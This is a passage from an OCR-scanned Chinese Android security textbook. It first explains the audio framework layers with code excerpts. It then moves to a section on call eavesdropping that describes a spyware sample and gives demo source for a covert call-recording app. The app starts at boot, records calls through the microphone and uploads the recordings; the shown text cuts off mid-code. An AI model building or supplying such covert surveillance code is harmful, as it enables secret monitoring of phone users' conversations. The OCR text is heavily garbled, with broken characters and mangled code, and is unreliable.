Audio 系统 主要 分 成 如 下 儿 个 层次 。 

(1) Media 库 提供 的 Audio 系统 本 地 部 分 接口 。 
(2) AudioFlinger 作为 Audio 系统 的 中 间 层 。 
(3) Audio 的 硬件 抽象 层 提供 底层 支持 。 
(4) Audio 接口 通过 JNI 和 Java 框架 提供 给 上 层 。 
Android 音频 系统 的 基本 层次 结构 如 图 7-4 所 示 。 
图 7-4 中 各 个 构成 部 分 的 具体 说 明 如 下 所 示 。 
(1) Audio 的 Java 部 分 
Java 部 分 的 代码 路 径 是 frameworks/base/media/java/android/media . 
与 Audio 相关 的 Java 包 是 android.media， 主 要 包含 了 和 AudioManager. Audio 等 系统 相关 的 类 。 
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Java 框 架 
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J| | 


V AudioHardwarelnterface 
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Recorder || System Track i 
Audio HAL Audio А 
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Audio Driver /dev/eac 


图 7-4 Android 音频 系统 的 框架 结构 


(2) Audio 的 JNI 部 分 

INI 部 分 的 代码 路 径 是 frameworks/base/core/jni, 生成 库 是 libandroid_runtime.so, Audio 的 INI 是 其 中 的 
-个 部 分 。 

(3) Audio 的 框架 部 分 

框架 部 分 的 头 文件 路 径 是 frameworks/base/includemedia/， 源 代码 路 径 是 frameworks/base/media/libmedia/.. 

Audio 本 地 框架 是 Media 库 的 一 部 分 ， 本 部 分 内 容 被 编译 成 库 libmedia.so， 提 供 Audio 部 分 的 接口 〈 包 
括 基于 Binder 的 IPC 机 制 ) 。 

(4) Audio Flinger 

Flinger 部 分 的 代码 路 径 是 frameworks/base/libs/audioflinger， 此 部 分 内 容 被 编译 成 库 libaudioflinger.so, 
这 是 Audio 系统 的 本 地 服务 部 分 。 

(5) Audio 的 硬件 抽象 层 接口 

硬件 抽象 层 接口 的 头 文件 路 径 是 hardware/libhardware_legacy/include/hardware/。 

Audio 硬件 抽象 层 的 实现 在 各 个 系统 中 可 能 是 不 同 的 ， 需 要 使 用 代码 去 继承 相应 的 类 并 实现 它们 ， 作 为 
Android 系统 本 地 框架 层 和 驱动 程序 接口 。 


7.2.2 分析 音频 系统 的 层次 


在 Android 中 ，Audio 系统 从 上 到 下 分 别 由 Java 的 Audio 类 、Audio 本 地 框架 类 、AudioFlinger 和 Audio 
的 硬件 抽象 层 儿 个 部 分 组 成 。 
1. 层次 说 明 
(1) Audio 本 地 框架 类 : 是 libmedia.so 的 一 个 部 分 ， 这 些 Audio 接口 对 上 层 提供 接口 ， 由 下 层 的 本 地 
代码 去 实现 。 
(2) AudioFlinger: 继承 了 libmedia 中 的 接口 ， 提 供 实现 库 libaudiofilnger.so。 这 部 分 内 容 没 有 自己 的 
对 外 头 文件 ， 上 层 调 用 的 只 是 libmedia 本 部 分 的 接口 ， 但 实际 调用 的 内 容 是 libaudioflinger.so 
(3) INI: 在 Audio 系统 中 ,使 用 JNI 和 Java 对 上 层 提供 接口 ，JNI 部 分 通过 调用 libmedia 库 提供 的 接 
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口 来 实现 。 
(4) Audio 硬件 抽象 层 : 提供 到 硬件 的 接口 ， 供 AudioFlinger 调用 。Audio 的 硬件 抽象 层 实际 上 是 各 个 
平台 开发 过 程 中 需要 主要 关注 和 独立 完成 的 部 分 。 
因为 Android 中 的 Audio 系统 不 涉及 编 解码 环节 ， 只 负责 上 层 系统 和 底层 Audio 硬件 的 交互 ， 所 以 通常 
以 PCM 作为 输入 /输出 格式 。 
在 Android 的 Audio 系统 中 ， 无 论 上 层 还 是 下 层 ， 都 使 用 一 个 管理 类 和 输出 ， 输 入 两 个 类 来 表示 整个 
Audio 系统 ， 输 出 /输入 两 个 类 负责 数据 通道 。 在 各 个 层次 之 间 具 有 对 应 关系 ， 如 表 7-1 所 示 。 


表 7-1 Android 各 个 层次 的 对 应 关系 


层次 说 明 Audio 管理 环节 Audio 输出 Audio 输入 


Java 层 android.media android.media android.media 
AudioSystem AudioTrack AudioRecorder 

本 地 框架 层 | AudioSystem AudioTrack AudioRecorder 

AudioFlinger TAudioF linger TAudioTrack TAudioRecorder 


2. Media 库 中 的 Audio 框架 


在 Media 库 中 提供 了 Android 的 Audio 系统 的 核心 框架 ， 在 库 中 实现 了 AudioSystem、AudioTrack 和 
AudioRecorder 这 3 个 类 。 另 外 还 提供 了 IAudioFlinger 类 接口 ， 通 过 此 类 可 以 获得 IAudioTrack 和 
IAudioRecorder 两 个 接口 ， 分 别 用 于 声音 的 播放 和 录制 。AudioTrack 和 AudioRecorder 分 别 通 过 调用 
IAudioTrack 和 IAudioRecorder 来 实现 。 

Audio 系统 的 头 文件 被 保存 在 frameworks/base/include/media/ 目 录 中 ， 其 中 包含 了 如 下 头 文件 。 
AudioSystem.h: media 库 的 Audio 部 分 对 上 层 的 总 管 接口 。 
lAudioFlinger.h: 需要 下 层 实现 的 总 管 接口 。 

AudioTrack.h: 放 音 部 分 对 上 接口 。 

lAudioTrack.h: 放 音 部 分 需要 下 层 实现 的 接口 。 
AudioRecorder.h: 录音 部 分 对 上 接口 。 
IAudioRecorder.h: 录音 部 分 需要 下 层 实 现 的 接口 。 

其 中 ， 文 件 IAudioFlinger.h、IAudioTrack.h 和 IAudioRecorder.h 的 接口 是 通过 下 层 的 继承 来 实现 的 。 文 
件 AudioFlingerh、AudioTrack.h 和 AudioRecorder.h 是 对 上 层 提供 的 接口 ， 它 们 既 供 本 地 程序 调用 (例如 声 
音 的 播放 器 、 录 制 器 等 ) ， 也 可 以 通过 JNI 向 Java 层 提供 接口 。 

有 具体 从 功能 上 看 ，AudioSystem 用 于 综合 管理 Audio 系统 ， 而 AudioTrack 和 AudioRecorder 分 别 负责 输 
出 和 输入 音频 数据 ， 即 分 别 实现 播放 和 录制 功能 。 

在 文件 AudioSystem.h 中 定义 了 枚 举 值 和 set/get 等 一 系列 接口 ， 主 要 代码 如 下 所 示 。 


AudioStreamOut AudioStreamln 


DODDODUO 


class AudioSystem 

{ 

public: 

enum stream_type { 11 Audio 流 的 类 型 

SYSTEM = 1, 
RING = 2, 
MUSIC = 3, 
ALARM = 4, 


NOTIFICATION = 5, 
BLUETOOTH SCO = 6, 


ё 


第 7 章 电话 系统 的 安全 机 制 


ENFORCED AUDIBLE - 7, 
NUM STREAM TYPES 
Е 
enum audio output type ( 11 Audio 数据 输出 类 型 
AUDIO OUTPUT DEFAULT --1, 
AUDIO OUTPUT HARDWARE - 0, 
AUDIO OUTPUT A2DP = 1, 
NUM AUDIO OUTPUT TYPES 
k 
enum audio format ( 1 Audio 数据 格式 
FORMAT DEFAULT = 0, 
PCM 16 BIT, 
PCM 8 BIT, 
INVALID FORMAT 
k 
enum audio mode ( 11 Audio 模式 
MODE INVALID = -2 
MODE CURRENT 
MODE NORMAL - 0, 
MODE RINGTONE, 


1, 


MODE IN CALL, 

NUM MODES JI not a valid entry, denotes end-of-list 
Е 
enum audio_routes { 11 Audio 路 径 类 型 


ROUTE_EARPIECE = (1 << 0), 

ROUTE SPEAKER = (1 << 1), 

ROUTE_BLUETOOTH_SCO = (1 << 2), 

ROUTE_HEADSET = (1 << 3), 

ROUTE_BLUETOOTH_A2DP = (1 << 4), 

ROUTE_ALL = -1UL, 
5 

епит audio_in_acoustics { 

АСС ENABLE = 0x0001, 

AGC DISABLE = 0, 

NS ENABLE - 0x0002, 

NS DISABLE = 0, 

TX IIR ENABLE = 0x0004, 

TX DISABLE =0 
X 
static status t speakerphone(bool state); 
static status t isSSpeakerphoneOn(bool"* state); 
static status t bluetoothSco(bool state); 
static status t isBluetoothScoOn(bool* state); 
static status t muteMicrophone(bool state); 
static status t isMicrophoneMuted(bool *state); 
static status t setMasterVolume(float value); 
static status t setMasterMute(bool mute); 
static status t getMasterVolume(float* volume); 
static status t getMasterMute(bool* mute); 
static status t setStreamVolume(int stream, float value); 
static status t setStreamMute(int stream, bool mute); 
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static status t getStreamVolume(int stream, float“ volume); 
static status t getStreamMute(int stream, bool* mute); 
static status t setMode(int mode); 
static status t getMode(int* mode); 
static status t setRouting(int mode, uint32 t routes, uint32 t mask); 
static status t getRouting(int mode, uint32 t* routes); 
static status t isMusicActive(bool *state); 
static status t setParameter(const char* key, const char* value); 
static void setErrorCallback(audio error callback cb); 
static const sp<lAudioFlinger>& get audio flinger(); 
static float linearToLog(int volume); 
static int logToLinear(float volume); 
static status t getOutputSamplingRate(int* samplingRate, int stream = DEFAULT); 
static status t getOutputFrameCount(int* frameCount, int stream = DEFAULT); 
static status t getOutputLatency(uint32 t* latency, int stream = DEFAULT); 
static bool routedToA2dpOutput(int streamType); 
static status t getlnputBufferSize(uint32 t sampleRate, int format, int channelCount, 
size t* buffSize); 
X 
在 上 述 枚 举 值 中 ， 是 用 单独 的 位 来 表示 audio_routes， 而 不 是 用 顺序 的 枚 举 值 来 表示 ， 所 以 在 使 用 这 个 
值 的 过 程 中 可 以 使 用 “或 ”的 方式 。 例 如 ， 表 示 声 音 既 可 以 从 耳机 (EARPIECE) 输出， 也 可 以 从 扬声器 
(SPEAKER) 输出 。 上 述 功 能 是 否 能 够 实现 ， 是 由 下 层 提供 支持 的 。 在 这 个 类 中 ，set/get 等 接口 控制 的 也 
是 相关 的 内 容 ， 例 如 ，Audio 声音 大 小 、Audio 模式 和 路 径 等 。 
AudioTrack 是 Audio 输出 环节 的 类 ， 在 里 面包 含 了 最 重要 的 接口 write()， 主 要 代码 如 下 所 示 。 
class AudioTrack 
{ 
typedef void (*callback t)(int event, 
void* user, void *info); 
AudioTrack( int streamType, 


uint32 t sampleRate = 0, /音频 的 采样 律 

int format = 0, /音频 的 格式 (例如 8 位 或 者 16 位 的 PCM) 
int channelCount = 0, /音频 的 通道 数 

int frameCount = 0, /音频 的 帧 数 


uint32_t flags = 0, 
callback_t cbf = 0, 

void* user = 0, 

int notificationFrames = 0); 


void start(); 

void stop(); 

void flush(); 

void pause(); 

void mute(bool); 

ssize_t write(const void* buffer, size_t size); 


类 AudioRecord 用 于 实现 和 Audio 输入 相关 的 功能 ， 其 中 最 
主要 代码 如 下 所 示 。 
class AudioRecord 


{ 
public: 


(m, 


eN 


和 E 要 的 功能 是 通过 接口 函数 read0 实 现 的 ， 
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AudioRecord(int streamType, 
uint32 t sampleRate = 0, /音频 的 采样 律 
int format = 0, /音频 的 格式 〈 例 如 8 位 或 者 16 位 的 PCM) 
int channelCount = 0, /音频 的 通道 数 
intframeCount = 0, // 音 频 的 帧 数 


uint32 tflags = 0, 
callback t cbf = 0, 
void* user = 0, 
int notificationFrames = 0); 
status t start(); 
status t stop(); 
ssize_t read(void* buffer, size t size); 
在 类 AudioTrack 和 AudioRecord 中 ,函数 read0 和 write() 的 参数 都 是 内 存 的 指针 及 其 大 小 ， 内 存 中 的 内 
容 一 般 表 示 的 是 Audio 的 原始 数据 PCM 数据 ) 。 这 两 个 类 还 涉及 Audio 数据 格式 、 通 道 数 、 帧 数目 等 参 
数 ， 不 但 可 以 在 建立 时 指定 ， 也 可 以 在 建立 之 后 使 用 set0 函 数 进行 设置 。 
另外 ， 在 libmedia 库 中 提供 的 只 是 一 个 Audio 系统 框架 ， HH, X AudioSystem、AudioTrack 和 
AudioRecord 分 别 调用 下 层 的 接口 IAudioFlinger、IAudioTrack 和 IAudioRecord 来 实现 。 另 外 的 一 个 接口 是 
IAudioFlingerClient， 作 为 向 LAudioFlinger 中 注册 的 监听 器 ， 相 当 于 使 用 回调 函数 获取 IAudioFlinger 运行 时 
信息 。 


3. 本 地 代码 


在 Android 系统 中 ，AudioFlinger 是 Audio 音频 系统 的 中 间 层 ， 能 够 作为 libmedia 提供 的 Audio 部 分 接 
口 的 实现 。 这 部 分 本 地 代码 的 路 径 如 下 。 
frameworks/base/libs/audioflinger 
文件 AudioFlinger.h 和 AudioFlinger.cpp 是 实现 AudioFlinger 的 核心 文件 ,在 里 面 提 供 了 类 AudioF linger, 
此 类 是 一 个 IAudioFlinger 的 实现 ， 其 接口 代码 如 下 所 示 。 
class AudioFlinger : public BnAudioFlinger, 
public IBinder::DeathRecipient 
{ 
public: 
static void instantiate(); 
virtual status t dump(int fd, const Vector<String16>& args); 
virtual spelAudioTrack» createTrack( 
/获得 音频 输出 接口 (Track) 
pid t pid, 
int streamType, 
uint32 t sampleRate, 
int format, 
int channelCount, 
int frameCount, 
uint32_t flags, 
const sp<IMemory>& sharedBuffer, 
status t *status); 
virtual uint32 t sampleRate(int output) const; 
virtual int channelCount(int output) const; 
virtual int format(int output) const; 
virtual size t frameCount(int output) const; 
virtual uint32 t latency(int output) const; 
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virtual status t setMasterVolume(float value); 
virtual status t setMasterMute(bool muted); 
virtual status t setStreamVolume(int stream, float value); 
virtual status t setStreamMute(int stream, bool muted); 
virtual status t setRouting(int mode, uint32 t routes, uint32 t mask); 
virtual uint32 t getRouting(int mode) const; 
virtual status t setMode(int mode); 
virtual int getMode() const; 
virtual ѕр<ІАџаіоКесога> openRecord( 
П 获得 音频 输出 接口 (Record) 
pid t pid, 
int streamType, 
uint32 t sampleRate, 
int format, 
int channelCount, 
int frameCount, 
uint32 t flags, 
status t *status); 
由 上 述 代码 可 以 看 出 ，AudioFlinger 使 用 函数 createTrack() 来 创建 音频 的 输出 设备 IAudioTrack， 使 用 函 


数 openRecord() 来 创建 音频 的 输入 设备 IAudioRecord， 并 且 还 使 用 接口 get/set 来 实现 控制 功能 。 
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构造 函数 AudioFlinger() 的 代码 如 下 所 示 。 
AudioFlinger::AudioFlinger() 
{ 
mHardwareStatus = AUDIO_HW_IDLE; 
mAudioHardware = AudioHardwarelnterface::create(); 
mHardwareStatus = AUDIO HW INIT; 
if (mAudioHardware->initCheck() == NO ERROR) ( 
mHardwareStatus = AUDIO HW OUTPUT OPEN; 
status t status; 
AudioStreamOut *hwOutput = 
mAudioHardware->openOutputStream (AudioSystem::PCM 16 BIT, 0, 0, &status); 
mHardwareStatus - AUDIO HW IDLE; 
if (hwOutput) { 
mHardwareMixerThread = 
new MixerThread(this, hwOutput, AudioSystem::AUDIO_OUTPUT_HARDWARE); 
) else { 
LOGE("Failed to initialize hardware output stream, status: %d", status); 
} 
#ifdef WITH_A2DP 
mA2dpAudiolnterface = new A2dpAudiolnterface(); 
AudioStreamOut *a2dpOutput = mA2dpAudiolnterface->openOutputStream(AudioSystem::PCM_16_BIT, 0, 0, 
&status); 
if (a2dpOutput) { 
mA2dpMixerThread = new MixerThread(this, a2dpOutput, AudioSystem::AUDIO OUTPUT A2DP); 
if (hwOutput) { 
uint32_t frameCount = ((a2dpOutput->bufferSize()/a2dpOutput->frameSize()) * hwOutput->sample 
Rate()) / a2dpOutput->sampleRate(); 
MixerThread::OutputTrack *a2dpOutTrack = new MixerThread::OutputTrack(mA2dpMixerThread, 
hwOutput->sampleRate(), 
AudioSystem::PCM_16_BIT, 
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hwOutput->channelCount(), 
frameCount); 
mHardwareMixerThread->setOuputTrack(a2dpOutTrack); 
} 
} else { 
LOGE("Failed to initialize A2DP output stream, status: %d", status); 
} 
#endif 
setRouting(AudioSystem:MODE NORMAL, AudioSystem:ROUTE SPEAKER, AudioSystem:ROUTE ALL); 
setRouting(AudioSystem:MODE RINGTONE, AudioSystem::ROUTE SPEAKER, AudioSystem::ROUTE ALL); 
setRouting(AudioSystem::MODE IN CALL, AudioSystem::ROUTE EARPIECE, AudioSystem::ROUTE ALL); 
setMode(AudioSystem::MODE NORMAL); 
setMasterVolume(1.0f); 
setMasterMute(false); 
mAudioRecordThread = new AudioRecordThread(mAudioHardware, this); 
if (mAudioRecordThread != 0) { 
mAudioRecordThread->run("AudioRecordThread", PRIORITY URGENT AUDIO); 
} 
) else ( 
LOGE("Couldn't even initialize the stubbed audio hardware!"); 
} 
} 
由 上 述 代码 可 以 看 出 ， 在 初始 化 AudioFlinger 之 后 ， 会 首先 获得 放 音 设备 ， 然 后 为 混 音 器 (Mixer) Ж 
立 线 程 并 建立 放 音 设备 线程 ， 最 后 在 线程 中 获得 放 音 设备 。 
在 文件 AudioResampler.h 中 定义 了 类 AudioResampler， 此 类 是 一 个 音频 重 取 样 器 的 工具 类 ， 定 义 代码 


如 下 所 示 。 
class AudioResampler { 
public: 
enum src_quality { 
DEFAULT=0, 
LOW_QUALITY=1, // 线 性 差 值 算法 
MED_QUALITY=2, // 立 方差 值 算法 
HIGH_QUALITY=3 // fixed multi-tap FIR 算法 
y: 


static AudioResampler* create(int bitDepth, 
int inChannelCount, /静态 地 创建 函数 
int32 t sampleRate, int quality=DEFAULT); 
virtual -AudioResampler(); 
virtual void init() = 0; 
virtual void setSampleRate(int32 t inSampleRate); 
// 设 置 重 采 样 率 
virtual void setVolume(int16_t left, int16_t right); 
/设置 音量 
virtual void resample(int32_t* out, size t outFrameCount, 
AudioBufferProvider* provider) = 0; 
Е 
在 上 述 音 频 重 取样 工具 类 中 ， 包 含 了 如 下 3 种 质量 。 
口 低 等 质量 (LOW QUALITY) : 使 用 线性 差 值 算法 实现 。 
О 中 等 质量 (MED QUALITY) : 使 用 立方 差 值 算法 实现 。 
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О 高 等 质量 CHIGH_QUALITY) : 使 用 FIR (有 限 阶 滤波 器 实现 。 


在 AudioResampler 中 ，AudioResamplerOrderl 是 线性 实现 ，AudioResamplerCubic.* 文 件 提供 立方 实现 
方式 ，AudioResamplerSinc.* 提 供 FIR 实现 。 
通过 文件 AudioMixer.h 和 AudioMixer.cpp 实现 了 一 个 Audio 系统 混 音 器 ， 它 被 AudioFlinger 调用 ， 


般 


接 [ 


文件 分 别 对 应 了 Android Java 框架 中 的 3 个 类 的 支持 ， 具 体 说 明 如 下 所 示 。 


- 致 。 对 于 数据 流 操作 来 说 ， 上 


于 在 声音 输出 之 前 的 处 理 ， 提 供 多 通道 处 理 、 声 音 缩放 、 重 取样 。AudioMixer 调用 了 AudioResampler。 


4. JNI 代码 


在 Android 中 的 Audio 系统 中 , 通过 INI 向 Java 层 提供 功能 强大 的 接口 , 这 样 就 可 以 在 Java 层 通过 INI 


完成 Audio 系统 的 大 部 分 操作 。 


Audio JNI 的 实现 代码 保存 在 frameworks/base/core/jni 目录 下 ， 在 目录 中 主要 有 3 个 核心 文件 ， 这 3 个 


口 android.media.AudioSystem: 负责 Audio 系 统 的 总 体 控制 。 
口 android.media.AudioTrack: 负责 Audio 系 统 的 输出 环节 。 
口 android.media.AudioRecorder: 负责 Audio 系 统 的 输入 环节 。 


在 Android 的 Java 层 中 ， 可 以 对 Audio 系统 进行 控制 和 数据 流 操 作 ， 其 中 控制 操作 和 底层 的 处 理 基本 


HF Java 不 支持 指针 ， 因 此 接口 被 封装 成 了 另外 的 形式 。 例 如 ， 


:音频 输出 


功能 中 , 通过 文件 android_media_AudioTrack.cpp 提供 了 写字 节 和 写 短 整 型 的 接口 类 型 。 对 应 代码 如 下 所 示 。 


static jint android_media_AudioTrack_native_ 
write(JNIEnv *env, jobject thiz, 
jbyteArray javaAudioData, 
jint offsetlnBytes, jint sizelnBytes, 
jint javaAudioFormat) { 
jbyte* cAudioData = NULL; 
AudioTrack *IpTrack = NULL; 
IpTrack = (AudioTrack *)env->GetlntField( 
thiz, javaAudioTrackFields. Native TrackInJavaObj); 
ssize t written = 0; 
if (IpTrack-»sharedBuffer() == 0) ( 
// 进 行 写 操作 
written = IpTrack->write(cAudioData + 
offsetlnBytes, sizelnBytes); 
) else ( 
if (javaAudioFormat == javaAudioTrackFields.PCM16) ( 
memcpy(IpTrack->sharedBuffer()->pointer(), 
cAudioData+offsetlnBytes, sizelnBytes); 
written = sizelnBytes; 
) else if (javaAudioFormat == javaAudioTrackFields.PCM8) ( 
int count = sizelnBytes; 


int16_t *dst = (int16 t *)IpTrack->sharedBuffer()->pointer(); 


const int8 t*src = (const int8_t *) 
(cAudioData + offsetinBytes); 
while(count—) { 
*dst++ = (int16_t)(*src++“0x80) << 8; 
} 


written = sizelnBytes; 


@ 


are езлеотени ООШ 


env->ReleasePrimitiveArrayCritical(javaAudioData, cAudioData, 0); 
return (int)written; 
} 


5. Java 代码 


TE Android [I] Audio 系统 中 , 和 Java 相 关 的 类 定义 在 包 android.media 中 ,Java 部 分 的 代码 保存 在 frameworks/ 
base/media/java/android/media 目录 中 ， 在 里 面 主要 实现 了 如 下 类 。 

口 android.media.AudioSystem 

口 android.media. AudioTrack 

口 android.media.AudioRecorder 

口 android.media.AudioFormat 

其 中 前 3 个 类 和 本 地 代码 是 对 应 的 , 在 AudioFormat 中 提供 了 一 些 和 Audio 相关 的 枚 举 值 。 在 此 需要 注 
意 的 是 在 Audio 系 统 的 Java 代码 中 ,虽然 可 以 通过 AudioTrack 和 AudioRecorder 的 write() 和 read() 接 口 在 Java 
层 对 Audio 的 数据 流 进行 操作 ， 但 是 ， 更 多 的 时 候 并 不 需要 这 样 做 ， 而 是 在 本 地 代码 中 直接 调用 接口 进行 
数据 流 的 输入 /输出 ，Java 层 只 进行 控制 类 操作 ， 不 处 理 数据 流 。 
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EAI 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 7 章 \Android 电话 系统 的 安全 机 制 .avi 
本 节 将 详细 讲解 在 Android 系统 中 实现 无 线 通话 的 知识 ， 并 讲解 实现 通话 数据 加 密 的 基本 内 容 ,为 读者 
步 入 学 习 本 书后 面 的 知识 打下 基础 。 


7.3.1 防止 电话 监听 


在 国内 某 知名 “ 云 安全 ”数据 分 析 中 心 曾经 截获 了 一 款 名 为 “ 安 卓 窃听 猫 ” (SW.Msgspy) 的 Android 
恶意 软件 。 这 款 软件 以 “系统 信息 管理 ”为 名 植 入 到 用 户 手 机 之 后 ， 在 手机 开机 时 会 自动 启动 ， 并 在 后 台 
发 送 “ 灵 猫 已 开始 使 用 …… ”短信 内 容 到 指定 号 码 。 将 上 述 内 容 传送 到 病毒 作者 后 ， 会 在 手机 后 台 同 步 启 
动静 默 录音 功能 。 这 样 可 以 全 程 监听 手机 通话 信息 和 周围 环境 音 ， 并 通过 自动 联网 的 形式 进行 上 传 。 

在 Android 系统 中 实现 通话 监听 功能 的 方法 十 分 简单 ， 只 需 使 用 Service 编写 一 个 后 台 程 序 来 监听 通话 
即 可 ， 例 如 ， 接 听 电 话 后 在 后 台 实 现 录音 功能 。 使 用 Service 实现 通话 监听 并 录音 的 基本 流程 如 下 所 示 。 
(1) 编写 一 个 继承 于 Service 类 的 子 类 SMSService， 具 体 代 码 如 下 所 示 。 

publicclass SMSService extends Servicef} 

(2) 文件 在 AndroidManifest.xml 中 的 <application> 节 点 里 配置 上 述 服 务 ， 有 具体 代码 如 下 所 示 。 
<serviceandroid:name= ".SMSService"/> 

为 了 能 够 运行 上 述 服 务 ， 需 要 通过 调用 方法 Context.startService() 或 方法 Context.bindService() 来 启动 。 
虽然 上 述 两 个 方法 都 可 以 启动 Service， 但 是 两 者 的 使 用 场合 有 所 不 同 ， 具 体 说 明 如 下 所 示 。 

O 当 使 用 startService0 方 法 启用 服务 时 ， 调 用 者 与 服务 之 间 没 有 关联 ， 服 务 会 在 调用 者 退出 后 仍然 运 

行 。 如 果 调 用 startService0 方 法 前 服务 已 经 被 创建 ， 即 使 多 次 调用 startService() 方 法 也 不 会 多 次 创建 
服务 ， 但 是 会 导致 多 次 调用 onStart0) 方 法 。 当 采用 startService0 方 法 启动 服务 时 ， 只 能 调用 
Context.stopService() 方 法 结束 服务 ， 在 服务 结束 时 会 调用 onDestroy0 方 法 。 

O 当 使 用 bindService0 方 法 启用 服务 时 ， 调 用 者 与 服务 绑 定 在 了 一 起 ， 服 务 会 在 调用 者 退出 时 采用 
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Context.startService() 方 法 启动 服务 ,在 服务 未 被 创建 时 ， 系 统 会 先 调 用 服务 的 onCreate() 方 法 ,接着 
调用 onStart0) 方 法 。 

G) 通过 监听 电话 状态 的 方式 可 以 实现 电话 窃听 功能 ， 通 过 如 下 方法 可 以 监听 电话 状态 。 
TelephonyManager telManager =(TelephonyManager)this.getSystemService(Context.TELEPHONY_SERVICE); 
telManager.listen(new TelListener(), PhoneStateListener.LISTEN CALL STATE); 
private class TelListener extends PhoneStateListener{ 

@Override 
public void onCallStateChanged(int state, StringincomingNumber) { 
try{ 
switch (state) { 
case TelephonyManager.CALL STATE IDLE: // 无 任何 状态 时 
break; 
case TelephonyManager.CALL STATE OFFHOOK: // 接 起 电话 时 
break; 
case TelephonyManager.CALL_STATE_OFFHOOK: // 接 起 电话 时 
break; 
default: 
break; 
} 
}catch (Exception e) ( 
e.printStackTrace(); 
} 
super.onCallStateChanged(state, incomingNumber); 
) 
) 

(4) 在 文件 AndroidManifest.xml 中 添加 如 下 所 示 的 权限 。 
<uses-permissionandroid:name="android.permission.READ_PHONE_STATE"/> 

(5) 开始 实现 音频 采集 ， 可 以 使 用 手机 进行 现场 录音 ， 有 具体 步骤 如 下 所 示 。 

О 在 文件 AndroidManifest.xml 中 漆 加 音频 刻录 权限 ， 有 具体 代码 如 下 所 示 。 
<uses-permissionandroid:name="android.permission.RECORD_AUDIO"/> 

口 编写 如 下 音频 刻录 代码 。 

MediaRecorder recorder = new MediaRecorder(); 
recorder.setAudioSource(MediaRecorder.AudioSource.MIC);// 从 麦克 风采 集 声音 
recorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); // 内 容 输出 格式 
recorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB);// 音 频 编 码 方式 

File audioFile = new File(getCacheDir(), incomingNumber + " " + System.currentTimeMillis()+ ".3gp"); 
recorder.setOutputFile(audioFile.getAbsolutePath()); 

recorder.prepare(); /预期 准备 

recorder.start(); // 开 始 刻录 


recorder.stop(); /停止 刻录 
recorder.reset(); WBE 
recorder.release(); /释放 资源 


在 上 述 代码 中 使 用 ContextbindService() 方 法 启动 服务 ， 系 统 会 在 服务 未 被 创建 时 先 调用 服务 的 


onCreate() 方 法 ， 然 后 调用 onBind0 方 法 ， 这 时 调用 者 和 服务 被 绑 定 在 一 起 。 如 果 客 户 端 要 与 服务 进行 通信 ， 


那么 


onBind() 方 法 必须 返回 IBinder 对 象 。 如 果 调 用 者 退出 ， 系 统 会 先 调用 服务 的 onUnbind() 方 法 ， 然 后 调 


用 onDestroy0 方 法 。 如 果 在 调用 bindService() 方 法 前 已 经 绑 定 服务 ， 那 么 多 次 调用 bindService() 方 法 并 不 会 


导致 


多 次 创建 服务 及 绑 定 ， 也 就 是 说 onCreate() 和 onBind() 方 法 并 不 会 被 多 次 调用 。 如 果 调 用 者 希望 与 正在 


e 


第 7 章 “ 电 话 系统 的 安全 人 和 


绑 定 的 服务 解除 绑 定 ， 可 以 通过 调用 nbindService0 方 法 实现 ， 调 用 该 方法 也 会 导致 系统 调用 服务 的 
onUnbind() --> onDestroy() 方 法 。 
为 了 加 深 读 者 对 上 述 过 程 的 理解 ， 在 下 面 列 出 了 上 述 监听 通话 并 录音 流程 的 具体 演示 代码 。 
(1) 在 文件 AndroidManifest.xml 中 开启 读 取 和 声音 权限 ， 有 具体 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
«manifest xmlns:android="http://schemas.android.com/apk/res/android" 
package="com.king.phone" 
android:versionCode="1" 
android:versionName="1.0"> 
<uses-sdk android:minSdkVersion="17" /> 


«application android:icon="@drawable/icon" android:label="@string/app_name"> 
<service android:name=".PhoneListenService"></service> 
<receiver android:name=".BootBroadcastReceiver"> 
<intent-filter> 
«action android:name-"android.intent.action.BOOT COMPLETED"/» 
</intent-filter> 
</receiver> 


</application> 

<uses-permission android:name="android.permission.RECORD_AUDIO"/> 
<uses-permission android:name="android.permission.INTERNET"/> 

<uses-permission android:name="android.permission.READ_PHONE_STATE"/> 
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> 


</manifest> 
(2) 编写 文件 BootBroadcastReceiverjava， 功 能 是 设置 在 开机 时 立即 启动 监听 服务 ， 具 体 演 示 代 码 如 
下 所 示 。 
package com.king.phone; 
import android.content.BroadcastReceiver; 
import android.content.Context; 
import android.content.Intent; 
import android.util.Log; 
public class BootBroadcastReceiver extends BroadcastReceiver{ 
private static final String TAG = "PhoneListener"; 
@Override 
public void onReceive(Context context, Intent intent) { 
Log.i(TAG, "boot completed received"); 
Intent service = new Intent(context, PhoneListenService.class); 
context.startService(service); 
} 
} 
(3) 编写 文件 PhoneListenService.java 来 监听 来 电信 息 ， 将 监听 的 通话 内 容 录音 后 上 传 到 指定 的 位 置 ， 
有 具体 演示 代码 如 下 所 示 。 
package com.king.phone; 
import java.io.File; 
import android.app.Service; 
import android.content.Context; 
import android.content.Intent; 
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import android.media.MediaRecorder; 

import android.os.IBinder; 

import android.telephony.PhoneStateListener; 

import android.telephony.TelephonyManager; 

import android.util.Log; 

public class PhoneListenService extends Service( 
private static final String TAG = "PhoneListener"; 
@Override 
public void onCreate() ( 


} 


TelephonyManager telManager = (TelephonyManager)this.getSystemService(Context TELEPHONY SERVICE); 
telManager.listen(new TelListener(), PhoneStateListener.LISTEN CALL STATE); 

Log.i(TAG, "service created"); 

super.onCreate(); 


@Override 
public void onDestroy() ( 


) 


/清空 缓存 目录 下 的 所 有 文件 
File[ ] files = getCacheDir().listFiles(); 
if(files != null) 

for(File f : files )( 

f.delete(); 

} 
} 
Log.i(TAG, "service destroy"); 
super.onDestroy(); 


private class TelListener extends PhoneStateListener{ 


private MediaRecorder recorder; 
private String mobile; 
private File audioFile; 
private boolean record; 
@Override 
public void onCallStateChanged(int state, String incomingNumber) { 
try{ 
switch (state) ( 
case TelephonyManager.CALL_STATE_IDLE: /无 任何 状态 时 
if(record ){ 
recorder.stop(); /停止 刻录 
recorder.release(); // 释 放 资 源 
record = false; 
new Thread(new UploadTask()).start(); // 将 录音 文件 上 传 
} 
break; 
case TelephonyManager.CALL STATE OFFHOOK: // 接 起 电话 时 
recorder = new MediaRecorder(); 
recorder.setAudioSource(MediaRecorder.AudioSource.MIC);// 从 麦克 风采 集 声 音 
recorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP); /内 容 输出 格式 
